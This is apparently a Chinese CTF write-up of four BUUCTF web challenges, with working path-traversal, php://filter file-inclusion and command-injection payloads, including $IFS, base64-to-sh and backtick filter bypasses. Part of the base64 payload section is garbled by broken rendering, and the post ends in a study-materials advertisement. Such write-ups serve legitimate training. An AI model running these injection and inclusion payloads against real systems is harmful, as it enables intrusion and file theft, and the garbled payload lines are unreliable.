-->
#### 【传参】:
**利用hackbar用get方式传参:**
###
---
## [HCTF 2018]WarmUp
#### 本题考查:PHP、代码审计
第一步:查看页面源代码
第二步:访问相关页面
第三步:代码审计
#### 【查看页面源代码】:
**发现绿色注释:source.php**
#### 【访问source.php】:
"; } ?>
**值得注意的是,无论是直接访问source.php还是利用?file=source.php查看,返回结果都是**
**同一段代码,且直接访问source.php下面还会显示那张图片,也就是说当前网页其实就是在**
**source.php页面,即我们始终是在在soure.php页面进行传参!!!**
#### 【代码审计】:
**根据代码提示,存在一个hint.php页面,访问这个页面,可以得到flag的提示:**
即flag在文件ffffllllaaaagggg当中,但是我们目前并不知道该文件在那个目录下(白名单中也没有这个文件
Payload:
http://57222b26-44ad-489f-874a-51b708f283c2.node5.buuoj.cn:81/source.php?file=hint.php?/…/…/…/…/ffffllllaaaagggg
**这里有一篇博客解释了一下构造payload的原理:**
**当前的source.php一般是在html目录下,往上是www,var,然后到根目录,flag一般就放**
**在根目录下面,这里还有一个hint.php?/或者source.php?/,因此需要返回四层才能到根目录。**
[[HCTF 2018]WarmUp全网最详细解释\_[hctf 2018]warmup的解-CSDN博客](https://bbs.csdn.net/topics/618653875)
###
---
## [ACTF2020 新生赛]Include
#### 本题考查:filter伪协议进行文件包含
**关于文件包含伪协议可以参考下面这篇博客:**
[File Inclusion(文件包含漏洞)学习 / 伪协议\_file协议漏洞-CSDN博客](https://bbs.csdn.net/topics/618653875)
#### 【查看页面源代码】:
**并没有什么可利用的**
#### 【查看url】:
**点击tips跳转,url多了?file=flag.php,但该页面只输出了:**
**目前的办法就是查看flag.php文件的源代码,看flag是否在源代码中被注释掉了,此处利用伪**
**协议:**
payload:
http://5165ec02-c72d-4737-85c5-295e639ea759.node3.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=flag.php
#### 【base64解码】:
###
---
## [ACTF2020 新生赛]Exec
#### 本题考查:命令执行
#### 【尝试执行ls命令】:
**输入:127.0.0.1;ls**
#### 【设法找到与flag相关的文件】:
**查看flag文件的内容:**
**!!!注意,上述截图中,输入框中的内容和回显内容不是同步的(即输入框的内容是与结果对应的语句,但结果出来后,输入框中本应该是没有内容的,主要是为了方便看加上去的)**
---
## [GXYCTF2019]Ping Ping Ping
#### 本题考查:命令执行
#### 【尝试一下用分号拼接ip和ls】:
**?ip=127.0.0.1;ls**
#### 【尝试查看flag.php文件】:
**?ip=127.0.0.1;cat flag.php 结果发现空格被过滤**
#### 【用{IFS}绕过空格被过滤】:
**用{IFS}绕过空格,发现标点符号也被过滤了:**
#### 【用不含有标点符号的方法绕过空格】:
**用$IFS$1绕过空格,提示flag也有被过滤掉,尝试打开index.php**
#### 【分析index.php的源代码】:
**发现好多东西都被过滤了:**
**& / ? \* < x{00}-\x{1f} ' " \ () [] {} 空格 "xxxfxxxlxxxaxxxgxxx" " " "bash"等**
#### 【根据源代码,分析出一下绕过方法】:
* **方法一:将cat flag.php直接用base64编码绕过**
?ip=127.0.0.1;echo$IFS
1
Y
2
F
0
I
G
Z
s
Y
W
c
u
c
G
h
w
∣
b
a
s
e
64
1Y2F0IGZsYWcucGhw|base64
1Y2F0IGZsYWcucGhw∣base64IFS
1
−
d
∣
b
a
s
h
/
/
但是
b
a
s
h
被过滤了
?
i
p
=
127.0.0.1
;
e
c
h
o
1-d|bash //但是bash被过滤了 ?ip=127.0.0.1;echo
1−d∣bash//但是bash被过滤了?ip=127.0.0.1;echoIFS
1
Y
2
F
0
I
G
Z
s
Y
W
c
u
c
G
h
w
∣
b
a
s
e
64
1Y2F0IGZsYWcucGhw|base64
1Y2F0IGZsYWcucGhw∣base64IFS$1-d|sh
//|sh 就是执行前面的echo脚本
* **方法二:空格用$IFS$1绕过,flag利用内联执行绕过:**
//内联:将反引号内命令的输出作为输入执行
?ip=127.0.0.1;cat$IFS$9ls
* **方法三:简单变量替换(利用源码):**
//单个变量
最后
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
WQosSz8-1715564674764)]
[外链图片转存中…(img-Js4yQJZr-1715564674764)]
[外链图片转存中…(img-lRazrkKF-1715564674764)]
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
扫一扫
1506
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
